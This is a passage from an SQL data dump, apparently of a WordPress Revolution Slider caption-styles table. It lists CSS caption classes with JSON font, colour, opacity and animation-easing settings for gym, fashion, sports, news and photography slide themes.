"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"80px\",\"line-height\":\"70px\",\"font-weight\":\"900\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}','{\"idle\":\"\",\"hover\":\"\"}'),(60,'.tp-caption.Gym-Subline','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"30px\",\"line-height\":\"30px\",\"font-weight\":\"100\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}','{\"idle\":{\"letter-spacing\":\"5px\"},\"hover\":\"\"}'),(61,'.tp-caption.Gym-SmallText','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"17px\",\"line-height\":\"22\",\"font-weight\":\"300\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}','{\"idle\":{\"text-shadow\":\"none\"},\"hover\":\"\"}'),(62,'.tp-caption.Fashion-SmallText','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"12px\",\"line-height\":\"20px\",\"font-weight\":\"600\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}','{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}'),(63,'.tp-caption.Fashion-BigDisplay','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}','{\"color\":\"#000000\",\"color-transparency\":\"1\",\"font-size\":\"60px\",\"line-height\":\"60px\",\"font-weight\":\"900\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}','{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}'),(64,'.tp-caption.Fashion-TextBlock','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}','{\"color\":\"#000000\",\"color-transparency\":\"1\",\"font-size\":\"20px\",\"line-height\":\"40px\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}','{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}'),(65,'.tp-caption.Sports-Display','{\"translated\":5,\"type\":\"text\",\"version\":\"5.0\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"130px\",\"line-height\":\"130px\",\"font-weight\":\"100\",\"font-style\":\"normal\",\"font-family\":\"\\\"Raleway\\\"\",\"padding\":\"0 0 0 0\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":\"0 0 0 0\",\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}','{\"idle\":{\"letter-spacing\":\"13px\"},\"hover\":\"\"}'),(66,'.tp-caption.Sports-DisplayFat','{\"translated\":5,\"type\":\"text\",\"version\":\"5.0\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"130px\",\"line-height\":\"130px\",\"font-weight\":\"900\",\"font-style\":\"normal\",\"font-family\":\"\\\"Raleway\\\"\",\"padding\":\"0 0 0 0\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":\"0 0 0 0\",\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}','{\"idle\":[\"\"],\"hover\":\"\"}'),(67,'.tp-caption.Sports-Subline','{\"translated\":5,\"type\":\"text\",\"version\":\"5.0\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}','{\"color\":\"#000000\",\"color-transparency\":\"1\",\"font-size\":\"32px\",\"line-height\":\"32px\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"\\\"Raleway\\\"\",\"padding\":\"0 0 0 0\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":\"0 0 0 0\",\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}','{\"idle\":{\"letter-spacing\":\"4px\"},\"hover\":\"\"}'),(68,'.tp-caption.Instagram-Caption','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-weight\":\"900\",\"font-style\":\"normal\",\"font-family\":\"Roboto\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}','{\"idle\":\"\",\"hover\":\"\"}'),(69,'.tp-caption.News-Title','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"70px\",\"line-height\":\"60px\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"Roboto Slab\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}','{\"idle\":\"\",\"hover\":\"\"}'),(70,'.tp-caption.News-Subtitle','{\"hover\":\"true\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"0.65\",\"text-decoration\":\"none\",\"background-color\":\"#ffffff\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"0px\",\"border-radius\":[\"0\",\"0\",\"0px\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"300\",\"easing\":\"Power3.easeInOut\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"15px\",\"line-height\":\"24px\",\"font-weight\":\"300\",\"font-style\":\"normal\",\"font-family\":\"Roboto Slab\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"#ffffff\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}','{\"idle\":\"\",\"hover\":\"\"}'),(71,'.tp-caption.Photography-Display','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"80px\",\"line-height\":\"70px\",\"font-weight\":\"100\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}','{\"idle\":{\"letter-spacing\":\"5px\"},\"hover\":\"\"}'),(72,'.tp-caption.Photography-Subline','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}','{\"color\":\"#777777\",\"color-transparency\":\"1\",\"font-size\":\"20px\",\"line-height\":\"30px\",\"font-weight\":\"300\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}','{\"idle\":{\"letter-spacing\":\"3px\"},\"hover\":\"\"}'),(73,'.tp-caption.Photography-ImageHover','{\"hover\":\"true\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"0.5\",\"scalex\":\"0.8\",\"scaley\":\"0.8\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"1000\",\"easing\":\"Power3.easeInOut\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"20\",\"line-height\":\"22\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0\",\"border-style\":\"none\",\"border-width\":\"0px\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}','{\"idle\":\"\",\"hover\":\"\"}'),(74,'.tp-caption.Photography-Menuitem','{\"hover\":\"true\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#00ffde\",\"background-transparency\":\"0.65\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"css_cursor\":\"pointer\",\"speed\":\"200\",\"easing\":\"Linear.easeNone\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-weight\":\"300\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"3px\",\"5px\",\"3px\",\"8px\"],\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"0.65\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}','{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}'),(75,'.tp-caption.Photography-Textblock','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}','{\"color\":\"#fff\",\"color-transparency\":\"1\",\"font-size\":\"17px\",\"line-height\":\"30px\",\"font-weight\":\"300\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}','{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}'),(76,'.tp-caption.Photography-Subline-2','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"0.35\",\"font-size\":\"20px\",\"line-height\":\"30px\",\"font-weight\":\"300\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}','{\"idle\":{\"letter-spacing\":\"3px\"},\"hover\":\"\"}'),(77,'.tp-caption.Photography-ImageHover2','{\"hover\":\"true\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"0.5\",\"scalex\":\"0.8\",\"scaley\":\"0.8\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"css_cursor\":\"pointer\",\"speed\":\"500\",\"easing\":\"Back.easeOut\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"20\",\"line-height\":\"22\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"Arial\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0\",\"border-style\":\"none\",\"border-width\":\"0px\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}','{\"idle\":\"\",\"hover\":\"\"}'),(78,'.tp-caption.WebProduct-Title','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\